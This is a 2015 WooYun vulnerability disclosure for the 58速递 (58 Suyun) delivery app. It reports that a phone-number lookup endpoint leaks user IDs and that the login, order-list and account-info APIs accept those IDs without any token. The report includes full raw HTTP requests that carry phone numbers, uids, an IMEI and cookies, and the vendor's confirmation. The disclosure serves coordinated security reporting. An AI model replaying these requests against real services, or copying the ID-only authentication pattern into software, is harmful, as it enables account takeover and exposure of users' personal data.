当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138752

漏洞标题:58速递某设计缺陷导致用户任意登陆(注册及未注册用户/任意用户订单/账号信息泄漏)

相关厂商:58同城

漏洞作者: BMa

提交时间:2015-09-03 11:10

修复时间:2015-10-19 01:10

公开时间:2015-10-19 01:10

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-03: 细节已通知厂商并且等待厂商处理中
2015-09-04: 厂商已经确认,细节仅向厂商公开
2015-09-14: 细节向核心白帽子及相关领域专家公开
2015-09-24: 细节向普通白帽子公开
2015-10-04: 细节向实习白帽子公开
2015-10-19: 细节向公众公开

简要描述:

58速递某设计缺陷导致用户任意登陆<注册及未注册用户>/任意用户订单/账号信息泄漏
一早起来看到司马同学在某漏洞下的评论,让我压力山大,这不赶紧挖个洞压压惊,再去看打鬼子

详细说明:

先来看某处缺陷,再看会造成哪些影响
首先在某处会通过用户手机号码即username返回用户的username及userid,username及userid会用在用户登录,用户账号信息/订单信息查看

GET /api/guest/mobile/bind?type=5&uid=&mobile=13184390431&r=0.2850908009537293&cityid=&realcityid= HTTP/1.1
Connection: close
cookie: null
i: 1
c: 3cce331aa4ac07fe2e0b5200cedc24cd
imei: 864587025424723
version: 3.3
Host: suyun.58.com
User-Agent: 58suyunandroid3.3
Cookie: id58=05dz8VXnikeFsjGnJPBfAg==
Cookie2: $Version=1
Accept-Encoding: gzip,deflate
mobile_version: 4.3
mobile_board: A0001


QQ20150903-2@2x.png


QQ20150903-6@2x.png


查看任意用户的订单记录:

POST /api/guest/order/list HTTP/1.1
cookie: null
version: 3.3
imei: 864587025424723
i: 1
c: 2a45cfd2657535aed158fecdbf3107d2
Content-Length: 102
Content-Type: application/x-www-form-urlencoded
Host: suyun.58.com
Connection: Keep-Alive
User-Agent: 58suyunandroid3.3
Cookie: id58=05dz8VXnikeFsjGnJPBfAg==
Cookie2: $Version=1
Accept-Encoding: gzip,deflate
mobile_version: 4.3
mobile_board: A0001
uid=628450255477809152&pagesize=10&page=1&mobile=13184390435&r=0.21973828516671368&cityid=&realcityid=


QQ20150903-1@2x.png


QQ20150903-7@2x.png


再来看看获取account信息的请求:

POST /api/guest/getaccountinfo HTTP/1.1
cookie: null
version: 3.3
imei: 864587025424723
i: 1
c: ece60d48edd9805e9ce08cc28da70aaf
Content-Length: 81
Content-Type: application/x-www-form-urlencoded
Host: suyun.58.com
Connection: close
User-Agent: 58suyunandroid3.3
Cookie: id58=05dz8VXnikeFsjGnJPBfAg==
Cookie2: $Version=1
Accept-Encoding: gzip,deflate
mobile_version: 4.3
mobile_board: A0001
uid=633887946189185024&mobile=13184398564&r=0.670826055533804&cityid=&realcityid=


QQ20150903-8@2x.png


最后看看登陆时的请求,看看都返回了些啥

GET /passport/ps/login.do?rc3CsyJHPpClsXvaxr+i6xIPXPOUcxJgaQaRa8qjD8jEfuo5+bm6yuaA5UUzoBsY HTTP/1.1
Connection: close
cookie: null
Host: daojia.58.com
User-Agent: 58suyunandroid3.3
Cookie: id58=05dz8VXnikeFsjGnJPBfAg==
Cookie2: $Version=1
Accept-Encoding: gzip,deflate
mobile_version: 4.3
mobile_board: A0001


QQ20150903-9@2x.png


QQ20150903-10@2x.png


没有任何token之类不可伪造的内容,只有userid,而前面已经可以获得所有注册/未注册用户的userid,也就意味着可以登陆任意用户,包括现在的用户以及潜在用户

漏洞证明:

修复方案:

版权声明:转载请注明来源 BMa@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-09-04 01:09

厂商回复:

感谢提交,确认漏洞存在,会尽快修复处理!

最新状态:

暂无